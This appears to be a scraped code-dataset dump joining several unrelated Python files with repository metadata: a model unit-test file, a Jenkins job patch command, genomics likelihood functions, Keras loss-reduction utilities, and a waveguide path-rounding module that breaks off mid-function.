self.assertEqual(len(ProductCategory.query().all()),pc_before-3)
print("Test a_2_10: category delete relationships")
def test_a_2_011_category_deep(self):
#measuring lengths beofre actions
category = Category.query().get(5)
#print(category.deep())
self.assertEqual(category.deep(),
{'children':
[{'id': 6, 'name': 'Sport Cars', 'parent_id': 5},
{'id': 7, 'name': 'Electric Cars', 'parent_id': 5},
{'id': 8, 'name': 'Tractors', 'parent_id': 5}],
'id': 5, 'name': 'Cars', 'parent': None, 'parent_id': None,
'products':
[{'category_id': 5, 'id': 5, 'product_id': 1},
{'category_id': 5, 'id': 10, 'product_id': 2},
{'category_id': 5, 'id': 15, 'product_id': 3}]})
category = Category.query().get(4)
#print(category.deep())
self.assertEqual(category.deep(),
{'children': [], 'id': 4, 'name': 'Manual Cameras',
'parent': {'id': 2, 'name': 'Camera', 'parent_id': None},
'parent_id': 2, 'products':
[{'category_id': 4, 'id': 4, 'product_id': 1},
{'category_id': 4, 'id': 9, 'product_id': 2},
{'category_id': 4, 'id': 14, 'product_id': 3}]})
print("Test a_2_11: category deep")
def test_a_3_000_pc_intro(self):
print("")
print("")
print("_+++++++++++++++++++++++++++++++++_")
print("_+++++++++++++++++++ Models : 3 ) ProductCategory ++_")
print("_+++++++++++++++++++++++++++++++++_")
print("")
print("")
def test_a_3_001_pc_insert(self):
db_drop_and_create_all()
populate_tables()
pc1 = ProductCategory(product_id=3,category_id=7)
pc1.insert()
pcs = ProductCategory.query().all()
self.assertEqual(len(pcs),16)
print("Test a_3_1: pc insert")
def test_a_3_002_pc_update(self):
pc1 = ProductCategory.query().get(1)
#pc1.name = "modified"
pc1.update(name="modified")
pc_1 = ProductCategory.query().get(1)
self.assertEqual(pc_1.name,"modified")
print("Test a_3_2: pc update")
def test_a_3_003_pc_delete(self):
pc1 = ProductCategory.query().get(1)
pc1.delete()
pcs = ProductCategory.query().all()
self.assertEqual(len(pcs),15)
print("Test a_3_3: pc delete")
def test_a_3_004_populate(self):
populate_tables()
pcs = ProductCategory.query().all()
self.assertEqual(len(pcs),15)
print("Test a_3_4: Populate Tables")
def test_a_3_005_pc_values(self):
pc = ProductCategory.query().get(1)
self.assertEqual(pc.id,1)
self.assertEqual(pc.product_id,1)
self.assertEqual(pc.category_id,1)
#self.assertEqual(pc.parent,None)
#self.assertEqual(str(pc.children),
# '[{"id": 2, "name": "Camera", "parent_id": 1}]')
#print(pc.product.simple())
self.assertEqual(pc.product.simple(),
{'code': 789456611, 'id': 1, 'name': 'Cheese', 'price': 50.4,
'quantity': 7.89})
#print(pc.category.simple())
self.assertEqual(pc.category.simple(),
{'id': 1, 'name': 'Electronics', 'parent_id': None})
print("Test a_3_5: pc values")
def test_a_3_006_pc_insert_wrong(self):
pcs = ProductCategory.query().all()
old_records_number = len(pcs)
try:
#This code will not be executed
#There are missing required parameters
pc = ProductCategory()
pc.insert()
self.assertEqual(True,False)
except Exception as e:
self.assertEqual(str(e),"True != False")
pcs = ProductCategory.query().all()
new_records_number = len(pcs)
self.assertEqual(old_records_number,
new_records_number)
print("Test a_3_6: pc insert with missing"+
"required parameters")
def test_a_3_007_pc_delete_wrong(self):
pcs = ProductCategory.query().all()
old_records_number = len(pcs)
try:
#This code will not be executed
#There is no pc with the number 0
pc1 = ProductCategory.query().get(0)
pc1.delete()
self.assertEqual(True,False)
except Exception as e:
self.assertEqual(str(e),"'NoneType' "+
"object has no attribute 'delete'")
#print(str(e))
pcs = ProductCategory.query().all()
new_records_number = len(pcs)
self.assertEqual(old_records_number,
new_records_number)
print("Test a_3_7: pc delete mistake, non-existent"+
"pc id")
def test_a_3_008_pc_simple(self):
pc = ProductCategory.query().get(1).simple()
#print(pc)
self.assertEqual(pc,{'category_id': 1,
'id': 1, 'product_id': 1})
print("Test a_3_8: pc simple")
def test_a_3_009_pc_relationship_order(self):
pc = ProductCategory.query().get(1)
#pc.parent=None
#pc = ProductCategory.query().get(4)
print("Test a_3_9:pc relationship")
def test_a_3_010_pc_delete_relationships(self):
products_before = len(Product.query().all())
categories_before = len(Category.query().all())
pc_before = len(ProductCategory.query().all())
# deleting the product
pc_to_del = ProductCategory.query().get(1)
pc_to_del.delete()
self.assertEqual(len(Product.query().all()),products_before)
self.assertEqual(len(Category.query().all()),categories_before)
self.assertEqual(len(ProductCategory.query().all()),pc_before-1)
print("Test a_3_10: pc delete relationships")
def test_a_3_011_pc_deep(self):
#measuring lengths beofre actions
pc = ProductCategory.query().get(5)
#print(pc.deep())
self.assertEqual(pc.deep(),
{'category': {'id': 5, 'name': 'Cars', 'parent_id': None},
'category_id': 5, 'id': 5, 'product':
{'code': 789456611, 'id': 1, 'name': 'Cheese', 'price': 50.4,
'quantity': 7.89}, 'product_id': 1})
print("Test a_3_11: pc deep")
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
| 28.021119 | 77 | 0.690496 | 3,831 | 26,536 | 4.568781 | 0.061864 | 0.110552 | 0.014398 | 0.021368 | 0.742273 | 0.684454 | 0.603668 | 0.531395 | 0.471691 | 0.437868 | 0 | 0.050464 | 0.134497 | 26,536 | 946 | 78 | 28.05074 | 0.71163 | 0.096096 | 0 | 0.494526 | 0 | 0 | 0.193759 | 0.012307 | 0 | 0 | 0 | 0 | 0.175182 | 1 | 0.109489 | false | 0.025547 | 0.007299 | 0 | 0.122263 | 0.136861 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
418a73ccd36a29573b20675d0e5a6f1331e0f75a | 1,986 | py | Python | jenskipper/cli/patch.py | flupke/jenskipper | bb3de3745142a5b1bf3df40409711ae74fdb07ea | [
"Apache-2.0"
] | 4 | 2016-04-30T12:43:01.000Z | 2016-12-02T17:42:47.000Z | jenskipper/cli/patch.py | Stupeflix/jenskipper | bb3de3745142a5b1bf3df40409711ae74fdb07ea | [
"Apache-2.0"
] | null | null | null | jenskipper/cli/patch.py | Stupeflix/jenskipper | bb3de3745142a5b1bf3df40409711ae74fdb07ea | [
"Apache-2.0"
] | null | null | null | import subprocess
import click
from .. import utils
from .. import exceptions
from .. import jenkins_api
from . import decorators
from . import diff
@click.command()
@decorators.repos_command
@decorators.jobs_command(num_jobs=1)
@decorators.handle_all_errors()
@click.argument('fname', type=click.Path(exists=True, dir_okay=False,
writable=True))
@click.pass_context
def patch(context, jobs_names, base_dir, fname):
"""
Try to patch FNAME with the diff between local and remote versions of a
job.
WARNING: this may not always work and does not take into account the Jinja
macros. Always check your diffs before commiting changes made by this
command.
"""
session = jenkins_api.auth(base_dir)
# Get diff
job_name = jobs_names[0]
try:
diff_lines = diff.get_job_diff(session, base_dir, job_name, {},
reverse=True)
except exceptions.JobNotFound:
utils.sechowrap('')
utils.sechowrap('Unknown job: %s' % job_name, fg='red', bold=True)
utils.sechowrap('Job is present in the local repository, but not '
'on the Jenkins server.', fg='red')
context.exit(1)
# Patch output file
patch_proc = subprocess.Popen(['patch', '--no-backup-if-mismatch', fname],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# It's important to add a newline at the end of the patch, so patch can
# distinguate the end of the file
patch = ''.join(diff_lines).encode('utf8') + b'\n'
patch_stdout, patch_stderr = patch_proc.communicate(patch)
if patch_proc.returncode != 0:
click.secho('Patch failed:', fg='red', bold=True)
click.secho(patch_stdout.strip().decode('utf8'))
click.secho(patch_stderr.strip().decode('utf8'))
context.exit(1)
| 35.464286 | 78 | 0.624371 | 253 | 1,986 | 4.790514 | 0.478261 | 0.041254 | 0.037129 | 0.021452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005533 | 0.271903 | 1,986 | 55 | 79 | 36.109091 | 0.832642 | 0.181772 | 0 | 0.054054 | 0 | 0 | 0.096855 | 0.014465 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.189189 | 0 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
418dbdc2ab0a6e83c7236c8b810a43bb21ee2351 | 2,783 | py | Python | src/mykrobe/stats/stats.py | Phelimb/mykrobe-atlas-cli | 866471d0c2d7030698d37f5c90fd232cafc261d5 | [
"MIT"
] | 1 | 2020-01-10T06:43:22.000Z | 2020-01-10T06:43:22.000Z | src/mykrobe/stats/stats.py | Phelimb/mykrobe-atlas-cli | 866471d0c2d7030698d37f5c90fd232cafc261d5 | [
"MIT"
] | null | null | null | src/mykrobe/stats/stats.py | Phelimb/mykrobe-atlas-cli | 866471d0c2d7030698d37f5c90fd232cafc261d5 | [
"MIT"
] | null | null | null | from math import exp
from math import factorial
from math import log
import logging
logger = logging.getLogger(__name__)
def percent_coverage_from_expected_coverage(coverage):
# With low coverage we expect a lower percent of the sequence to be
# coverage.
return 1 - exp(-coverage)
def log_lik_probability_of_N_gaps(depth, percent_coverage):
L = 32
percent_coverage = float(percent_coverage)/100
n_gaps = int(round(L-(L*percent_coverage)))
expected_n_gaps = exp(-depth) * L
return log_poisson_prob(expected_n_gaps, n_gaps)
def log_poisson_prob(lam, k):
return -lam + k * log(lam) - log_factorial(k)
def log_factorial(n):
assert n >= 0
out = 0
for i in range(int(n)):
out += log(i + 1)
return out
def log_lik_depth(depth, expected_depth):
if expected_depth <= 0:
raise ValueError("Expected depth must be greater than 0")
if depth < 0:
raise ValueError("Depth must not be negative")
return log_poisson_prob(lam=expected_depth, k=depth)
def log_lik_R_S_coverage(observed_alternate_depth,
observed_reference_depth,
expected_alternate_depth,
expected_reference_depth):
lne = log_poisson_prob(
lam=expected_alternate_depth,
k=observed_alternate_depth)
le = log_poisson_prob(
lam=expected_reference_depth,
k=observed_reference_depth)
return lne + le
def depth_to_expected_kmer_count(depth):
return 32*depth+0.01
def log_lik_R_S_kmer_count(observed_reference_kmer_count,
observed_alternate_kmer_count,
expected_reference_depth,
expected_alternate_depth):
expected_reference_kmer_count = depth_to_expected_kmer_count(
expected_reference_depth)
expected_alternate_kmer_count = depth_to_expected_kmer_count(
expected_alternate_depth)
# logger.debug("%f, %f, %f" % (expected_reference_depth,
# expected_reference_kmer_count, observed_reference_kmer_count))
# logger.debug("%f, %f, %f" % (expected_alternate_depth,
# expected_alternate_kmer_count, observed_alternate_kmer_count))
lne = log_poisson_prob(
lam=expected_reference_kmer_count, k=observed_reference_kmer_count)
le = log_poisson_prob(
lam=expected_alternate_kmer_count, k=observed_alternate_kmer_count)
# logger.debug("%i, %i, %i, %f" % (expected_reference_depth,
# expected_reference_kmer_count, observed_reference_kmer_count, lne))
# logger.debug("%i, %i, %i, %f" % (expected_alternate_depth,
# expected_alternate_kmer_count, observed_alternate_kmer_count, le))
return lne + le
| 33.939024 | 106 | 0.684513 | 359 | 2,783 | 4.902507 | 0.192201 | 0.102273 | 0.081818 | 0.057955 | 0.488068 | 0.447727 | 0.320455 | 0.217045 | 0.170455 | 0.170455 | 0 | 0.008023 | 0.238591 | 2,783 | 81 | 107 | 34.358025 | 0.822558 | 0.224937 | 0 | 0.113208 | 0 | 0 | 0.029357 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 1 | 0.150943 | false | 0 | 0.075472 | 0.056604 | 0.377358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
418fb24b012a503b2e7384627bb584b231c134f7 | 6,660 | py | Python | keras/utils/losses_utils.py | PJmouraocs/keras | 7a39b6c62d43c25472b2c2476bd2a8983ae4f682 | [
"MIT"
] | 259 | 2016-02-09T09:06:29.000Z | 2021-07-29T05:27:40.000Z | keras/utils/losses_utils.py | PJmouraocs/keras | 7a39b6c62d43c25472b2c2476bd2a8983ae4f682 | [
"MIT"
] | 50 | 2016-02-24T14:46:57.000Z | 2020-01-20T07:34:19.000Z | keras/utils/losses_utils.py | PJmouraocs/keras | 7a39b6c62d43c25472b2c2476bd2a8983ae4f682 | [
"MIT"
] | 94 | 2016-02-17T20:59:27.000Z | 2021-04-19T08:18:16.000Z | """Utilities related to losses."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from .. import backend as K
class Reduction(object):
"""Types of loss reduction.
Contains the following values:
* `NONE`: Un-reduced weighted losses with the same shape as input. When this
reduction type used with built-in Keras training loops like
`fit`/`evaluate`, the unreduced vector loss is passed to the optimizer but
the reported loss will be a scalar value.
* `SUM`: Scalar sum of weighted losses.
* `SUM_OVER_BATCH_SIZE`: Scalar `SUM` divided by number of elements in losses.
"""
NONE = 'none'
SUM = 'sum'
SUM_OVER_BATCH_SIZE = 'sum_over_batch_size'
@classmethod
def all(cls):
return (cls.NONE, cls.SUM, cls.SUM_OVER_BATCH_SIZE)
@classmethod
def validate(cls, key):
if key not in cls.all():
raise ValueError('Invalid Reduction Key %s.' % key)
def squeeze_or_expand_dimensions(y_pred, y_true=None, sample_weight=None):
"""Squeeze or expand last dimension if needed.
1. Squeezes last dim of `y_pred` or `y_true` if their rank differs by 1.
2. Squeezes or expands last dim of `sample_weight` if its rank differs by 1
from the new rank of `y_pred`.
If `sample_weight` is scalar, it is kept scalar.
# Arguments
y_pred: Predicted values, a `Tensor` of arbitrary dimensions.
y_true: Optional label `Tensor` whose dimensions match `y_pred`.
sample_weight: Optional weight scalar or `Tensor` whose dimensions match
`y_pred`.
# Returns
Tuple of `y_pred`, `y_true` and `sample_weight`. Each of them possibly has
the last dimension squeezed, `sample_weight` could be extended by one
dimension.
"""
if y_true is not None:
y_pred_rank = K.ndim(y_pred)
y_pred_shape = K.int_shape(y_pred)
y_true_rank = K.ndim(y_true)
y_true_shape = K.int_shape(y_true)
if (y_pred_rank - y_true_rank == 1) and (y_pred_shape[-1] == 1):
y_pred = K.squeeze(y_pred, -1)
elif (y_true_rank - y_pred_rank == 1) and (y_true_shape[-1] == 1):
y_true = K.squeeze(y_true, -1)
if sample_weight is None:
return y_pred, y_true
y_pred_rank = K.ndim(y_pred)
weights_rank = K.ndim(sample_weight)
if weights_rank != 0:
if y_pred_rank == 0 and weights_rank == 1:
y_pred = K.expand_dims(y_pred, -1)
elif weights_rank - y_pred_rank == 1:
sample_weight = K.squeeze(sample_weight, -1)
elif y_pred_rank - weights_rank == 1:
sample_weight = K.expand_dims(sample_weight, -1)
return y_pred, y_true, sample_weight
def _num_elements(losses):
"""Computes the number of elements in `losses` tensor."""
with K.name_scope('num_elements') as scope:
return K.cast(K.size(losses, name=scope), losses.dtype)
def reduce_weighted_loss(weighted_losses, reduction=Reduction.SUM_OVER_BATCH_SIZE):
"""Reduces the individual weighted loss measurements."""
if reduction == Reduction.NONE:
loss = weighted_losses
else:
loss = K.sum(weighted_losses)
if reduction == Reduction.SUM_OVER_BATCH_SIZE:
loss = loss / _num_elements(weighted_losses)
return loss
def broadcast_weights(values, sample_weight):
# Broadcast weights if possible.
weights_shape = K.int_shape(sample_weight)
values_shape = K.int_shape(values)
if values_shape != weights_shape:
weights_rank = K.ndim(sample_weight)
values_rank = K.ndim(values)
# Raise error if ndim of weights is > values.
if weights_rank > values_rank:
raise ValueError(
'Incompatible shapes: `values` {} vs `sample_weight` {}'.format(
values_shape, weights_shape))
# Expand dim of weights to match ndim of values, if required.
for i in range(weights_rank, values_rank):
sample_weight = K.expand_dims(sample_weight, axis=i)
if weights_shape is not None and values_shape is not None:
for i in range(weights_rank):
if (weights_shape[i] is not None and
values_shape[i] is not None and
weights_shape[i] != values_shape[i]):
# Cannot be broadcasted.
if weights_shape[i] != 1:
raise ValueError(
'Incompatible shapes: `values` {} vs '
'`sample_weight` {}'.format(
values_shape, weights_shape))
sample_weight = K.repeat_elements(
sample_weight, values_shape[i], axis=i)
return sample_weight
def compute_weighted_loss(losses,
sample_weight=None,
reduction=Reduction.SUM_OVER_BATCH_SIZE,
name=None):
"""Computes the weighted loss.
# Arguments
losses: `Tensor` of shape `[batch_size, d1, ... dN]`.
sample_weight: Optional `Tensor` whose rank is either 0, or the same rank as
` losses`, or be broadcastable to `losses`.
reduction: (Optional) Type of Reduction to apply to loss.
Default value is `SUM_OVER_BATCH_SIZE`.
name: Optional name for the op.
# Raises
ValueError: If the shape of `sample_weight` is not compatible with `losses`.
# Returns
Weighted loss `Tensor` of the same type as `losses`. If `reduction` is
`NONE`, this has the same shape as `losses`; otherwise, it is scalar.
"""
Reduction.validate(reduction)
if sample_weight is None:
sample_weight = 1.0
with K.name_scope(name or 'weighted_loss'):
input_dtype = K.dtype(losses)
losses = K.cast(losses, K.floatx())
sample_weight = K.cast(sample_weight, K.floatx())
# Update dimensions of `sample_weight` to match with `losses` if possible.
losses, _, sample_weight = squeeze_or_expand_dimensions(
losses, None, sample_weight)
# Broadcast weights if possible.
sample_weight = broadcast_weights(losses, sample_weight)
# Apply weights to losses.
weighted_losses = sample_weight * losses
# Apply reduction function to the individual weighted losses.
loss = reduce_weighted_loss(weighted_losses, reduction)
# Convert the result back to the input type.
loss = K.cast(loss, input_dtype)
return loss
| 37.206704 | 84 | 0.633333 | 893 | 6,660 | 4.5028 | 0.19037 | 0.107436 | 0.023875 | 0.031833 | 0.256155 | 0.201442 | 0.067645 | 0.040786 | 0.040786 | 0.040786 | 0 | 0.005237 | 0.283183 | 6,660 | 178 | 85 | 37.41573 | 0.837034 | 0.344144 | 0 | 0.152174 | 0 | 0 | 0.043956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076087 | false | 0 | 0.054348 | 0.01087 | 0.25 | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4191ed02b99fe80f0d4118fb2e70bad9e2f6b771 | 18,531 | py | Python | zeropdk/layout/waveguide_rounding.py | lightwave-lab/zeropdk | cc49eb1008c449185cf9dcdbb283ba086ebd8de0 | [
"MIT"
] | 17 | 2019-08-22T15:55:50.000Z | 2022-02-02T20:52:00.000Z | zeropdk/layout/waveguide_rounding.py | lightwave-lab/zeropdk | cc49eb1008c449185cf9dcdbb283ba086ebd8de0 | [
"MIT"
] | 1 | 2020-09-29T00:43:38.000Z | 2020-10-27T07:15:01.000Z | zeropdk/layout/waveguide_rounding.py | lightwave-lab/zeropdk | cc49eb1008c449185cf9dcdbb283ba086ebd8de0 | [
"MIT"
] | 3 | 2019-09-04T07:48:35.000Z | 2021-06-16T09:39:42.000Z | """ Straight waveguide rounding algorithms"""
from functools import lru_cache
from math import atan2, tan, inf
import numpy as np
import klayout.db as kdb
from zeropdk.layout.geometry import rotate, fix_angle, cross_prod
from zeropdk.layout.algorithms.sampling import sample_function
from zeropdk.layout.waveguides import layout_waveguide
def angle_between(v1, v0):
"""Compute angle in radians between v1 and v0.
Rotation angle from v0 to v1 counter-clockwise.
"""
return fix_angle(atan2(v1.y, v1.x) - atan2(v0.y, v0.x))
def project(P, A, B):
"""Projects a point P into a line defined by A and B"""
AB = B - A
eAB = AB / AB.norm()
Pproj = A + (P - A) * eAB * eAB
return Pproj
def bisect(V1, V2):
"""Bisects two vectors V1 and V2. Returns a vector."""
# from https://math.stackexchange.com/questions/2285965/how-to-find-the-vector-formula-for-the-bisector-of-given-two-vectors
V = V1.norm() * V2 + V2.norm() * V1
return V / V.norm()
def intersect(A, eA, B, eB):
"""Computes intersection between lines defined by points A/B and vectors eA/eB"""
# from http://mathforum.org/library/drmath/view/62814.html
assert abs(cross_prod(eA, eB)) > 0, "Vectors must not be parallel"
a = cross_prod(B - A, eB) / cross_prod(eA, eB)
return A + a * eA
@lru_cache(maxsize=5)
def _min_clearance(angle_rad, radius):
""" Compute the minimum clearance for a tangent arc given an vertex angle."""
try:
return abs(radius / tan(angle_rad / 2))
except ZeroDivisionError:
return inf
def _solve_Z_angle(α1, α2, BC, R):
from math import sin, cos, tan, atan, acos
assert α1 * α2 # they should have the same sign
sign = α1 / abs(α1)
α1, α2 = abs(α1), abs(α2)
αprime = atan(0.5 / tan(α1) + 0.5 / tan(α2))
A = 2 / cos(αprime)
γ = -αprime + acos(1 / A * (1 / sin(α1) + 1 / sin(α2) - BC / R))
return γ * sign
class ClearanceRewind(Exception):
pass
class ClearanceForward(Exception):
pass
class _Arc:
def __init__(self, P1, C, P2, ccw):
from math import isclose
assert isclose(
(P2 - C).norm(), (P1 - C).norm(), abs_tol=1e-9
), "Invalid Arc" # inconsistent radius
self.P1 = P1 # first point
self.C = C # center
self.P2 = P2 # second point
self.ccw = ccw # True if counter-clockwise
def get_points(self):
from math import atan2, pi
P1, C, P2 = self.P1, self.C, self.P2
r = (P2 - C).norm()
theta_start = atan2((P1 - C).y, (P1 - C).x)
theta_end = atan2((P2 - C).y, (P2 - C).x)
if self.ccw:
theta_end = (theta_end - theta_start) % (2 * pi) + theta_start
else:
theta_start = (theta_start - theta_end) % (2 * pi) + theta_end
theta_start, theta_end = theta_end, theta_start
arc_function = lambda t: np.array([r * np.cos(t), r * np.sin(t)])
# in the function below, theta_start must be smaller than theta_end
t, coords = sample_function(arc_function, [theta_start, theta_end], tol=0.002 / r)
# This yields a better polygon
# The idea is to place a point right after the first one, to
# make sure the arc starts in the right direction
insert_at = np.argmax(theta_start + 0.001 <= t)
t = np.insert(t, insert_at, theta_start + 0.001)
coords = np.insert(coords, insert_at, arc_function(theta_start + 0.001), axis=1)
insert_at = np.argmax(theta_end - 0.001 <= t)
coords = np.insert(
coords, insert_at, arc_function(theta_end - 0.001), axis=1
) # finish the waveguide a little bit after
# create original waveguide poligon prior to clipping and rotation
dpoints_list = [C + kdb.DPoint(x, y) for x, y in zip(*coords)]
if not self.ccw:
dpoints_list = list(reversed(dpoints_list))
return dpoints_list
def __repr__(self):
return "Arc({P1}, {C}, {P2}, {CCW})".format(P1=self.P1, C=self.C, P2=self.P2, CCW=self.ccw)
class _Line:
def __init__(self, P1, P2):
self.P1 = P1
self.P2 = P2
def get_points(self):
return [self.P1, self.P2]
def get_length(self):
return (self.P2 - self.P1).norm()
def __repr__(self):
return "Line({P1}, {P2})".format(P1=self.P1, P2=self.P2)
def solve_Z(A, B, C, D, radius):
from math import sin, pi, copysign
AB = B - A
BC = C - B
CD = D - C
α1 = angle_between(-BC, AB)
α2 = angle_between(-BC, CD)
# print("AB, BC, CD=", AB, BC, CD)
# print("α1, α2=", degrees(α1), degrees(α2))
γ = _solve_Z_angle(α1, α2, BC.norm(), radius)
# print("γ=", degrees(γ))
eX1X2 = rotate(-BC, -γ) / BC.norm()
# print("eX1X2=", eX1X2)
x = radius / BC.norm() * (1 - sin(abs(α1 - γ))) / sin(abs(α1))
# print("x=", x)
X = B + x * BC
# print("X=", X)
X1 = X - eX1X2 * radius
X2 = X + eX1X2 * radius
Aprime = X1 + rotate(X - X1, copysign(pi / 2, α1) + γ - α1)
Dprime = X2 + rotate(X - X2, copysign(pi / 2, α2) + γ - α2)
# print("line", A, Aprime)
# print("arc2", Aprime, X1, X)
# print("arc2", X, X2, Dprime)
# print("line", Dprime, D)
return (
[_Line(A, Aprime), _Arc(Aprime, X1, X, α1 < 0), _Arc(X, X2, Dprime, α1 > 0)],
[Dprime, D],
)
def solve_U(A, B, C, D, radius):
# TODO: known bug. This assumes that there is enough space between
# A and B / C and D to perform the turn. Suggestion: if there isn't,
# abort or move Eprime and Gprime accordingly.
XB = bisect(A - B, C - B)
XC = bisect(B - C, D - C)
orientation = cross_prod(XB, XC) > 0 # positive if CCW waveguide turn
X = intersect(B, XB, C, XC)
XB, XC = B - X, C - X
Fprime = project(X, B, C)
h = (Fprime - X).norm()
# if h is too close to R, we will have extra unnecessary arcs
# use two solve_3 with h as a radius instead
if h >= radius - 0.001:
solution1, rest_points = solve_3(A, B, C, h)
solution2, rest_points = solve_3(rest_points[0], C, D, h)
return solution1 + solution2, rest_points
# F = X + (Fprime - X) * radius / h
# Bprime = X + XB * radius / h
# Cprime = X + XC * radius / h
eAB = B - A
eAB /= eAB.norm()
eDC = C - D
eDC /= eDC.norm()
Eprime = project(X, A, B)
Gprime = project(X, D, C)
E = X + (Eprime - X) * radius / h
G = X + (Gprime - X) * radius / h
def compute_A_prime(E, Eprime, eAB):
from math import sqrt
D = (E - Eprime).norm()
L = sqrt(D * (4 * radius - D))
Aprime = Eprime - eAB * L
return Aprime
Aprime = compute_A_prime(E, Eprime, eAB)
Dprime = compute_A_prime(G, Gprime, eDC)
Asec = Aprime + (E - X)
Dsec = Dprime + (G - X)
H = 0.5 * (Asec + X)
II = 0.5 * (Dsec + X)
return (
[
_Line(A, Aprime),
_Arc(Aprime, Asec, H, not orientation),
_Arc(H, X, II, orientation),
_Arc(II, Dsec, Dprime, not orientation),
],
[Dprime, D],
)
def solve_2(A, B):
return [_Line(A, B)], []
def solve_V(A, B, C, radius):
XB = bisect(A - B, C - B)
isCCW = cross_prod(C - B, A - B) > 0
Aprime = project(A, B, XB + B)
Cprime = project(C, B, XB + B)
rA = (A - Aprime).norm()
rC = (C - Cprime).norm()
if rA > rC:
Csec = project(Cprime, A, B)
return [_Line(A, Csec), _Arc(Csec, Cprime, C, isCCW)], []
else:
Asec = project(Aprime, B, C)
return [_Arc(A, Aprime, Asec, isCCW)], [Asec, C]
def solve_3(A, B, C, radius):
from math import cos, pi
p0, p1, p2 = A, B, C
α = angle_between(p0 - p1, p2 - p1)
if α % (2 * pi) == pi:
# if points are collinear, just ignore middle point
return ([], [p0, p2])
# sometimes users pick len1 and len2 to be exactly 1 radius.
# in that case, numerical errors might result in a ClearanceRewind
# or ClearanceForward.
# I am adding this 0.001 fix to correct that.
clear = _min_clearance(α, radius - 0.001)
len1 = (p1 - p0).norm()
len2 = (p2 - p1).norm()
if len1 < clear:
raise ClearanceRewind()
if len2 < clear:
raise ClearanceForward()
e1 = (p1 - p0) / len1
e2 = (p2 - p1) / len2
arc_center = p1 + 0.5 * (-e1 * clear + e2 * clear) / cos(α / 2) ** 2
return (
[
_Line(p0, p1 - e1 * clear),
_Arc(p1 - e1 * clear, arc_center, p1 + e2 * clear, α > 0),
],
[p1 + e2 * clear, p2],
)
def solve_4(A, B, C, D, radius):
AB = B - A
BC = C - B
CD = D - C
α1 = angle_between(-BC, AB)
α2 = angle_between(-BC, CD)
if α1 * α2 > 0:
return solve_Z(A, B, C, D, radius)
else:
return solve_U(A, B, C, D, radius)
def compute_rounded_path(points, radius):
"""Transforms a list of points into sections of arcs and straight lines.
Approach:
- Go through the list of points in triplets (A, B, C).
- Call solve3 in (A,B,C), which returns a rounded path plus (Bprime, C)
- Continue.
- If solve3 cannot solve because AB is too short, raise a ClearanceRewind error
- Conversely, if solve3 cannot solve because BC is too short, raise a ClearanceForward error
- In the case of ClearanceForward, call solve4 on (A,B,C,D)
- In the case of ClearanceForward, call solve4 on (O,A,B,C), where O is the previous point
Returns:
- A list of _Line and _Arc objects
"""
points_list = list(points) # in case points_list is an iterator
N = len(points_list)
if N == 2:
return [_Line(*points)]
# Sanity checks
assert N >= 3, "Insufficient number of points, N = {N} < 3".format(N=N)
old_rounded_path = rounded_path = list()
old_points_left = points_left = list(points)
can_rewind = False
while len(points_left) > 2:
try:
solution, rest_points = solve_3(*points_left[0:3], radius)
old_points_left = points_left[:]
points_left = rest_points + points_left[3:]
can_rewind = True
except ClearanceRewind:
if not can_rewind:
raise RuntimeError(
"Not enough space for enough turns: Cannot solve:", *points_left[0:3]
)
points_left = old_points_left
rounded_path = old_rounded_path
if len(points_left[0:4]) < 4:
raise RuntimeError(
"Not enough space for enough turns: Cannot solve:", *points_left[0:4]
)
solution, rest_points = solve_4(*points_left[0:4], radius)
old_points_left = points_left[:]
points_left = rest_points + points_left[4:]
can_rewind = False
except ClearanceForward:
if len(points_left[0:4]) < 4:
raise RuntimeError(
"Not enough space for enough turns: Cannot solve:", *points_left[0:4]
)
solution, rest_points = solve_4(*points_left[0:4], radius)
old_points_left = points_left[:]
points_left = rest_points + points_left[4:]
can_rewind = False
old_rounded_path = rounded_path[:]
rounded_path += solution
# there should be 2 points left in points_left
solution, rest_points = solve_2(*points_left[0:2])
rounded_path += solution
points_left = rest_points + points_left[2:]
assert len(points_left) == 0
return rounded_path
class _Path:
""" Object holding path plus width information"""
def __init__(self, points, widths):
self.points = points
# This can be a single width or a list of widths, just like in layout_waveguide()
self.widths = widths
def layout(self, cell, layer):
layout_waveguide(cell, layer, self.points, self.widths, smooth=False)
def __repr__(self):
return "Path({point1}...{pointN}, {widths})".format(
point1=self.points[0], pointN=self.points[-1], widths=self.widths
)
class _Taper(_Path):
def __init__(self, P1, P2, w1, w2):
self.P1 = P1
self.P2 = P2
self.w1 = w1
self.w2 = w2
self.points = [P1, P2]
self.widths = [w1, w2]
def __repr__(self):
return "Taper({P1}, {P2}, w1={w1}, w2={w2})".format(
P1=self.P1, P2=self.P2, w1=self.w1, w2=self.w2
)
def _compute_tapered_line(line, waveguide_width, taper_width, taper_length):
"""Takes a _Line object and computes two tapers with taper_width and taper_length"""
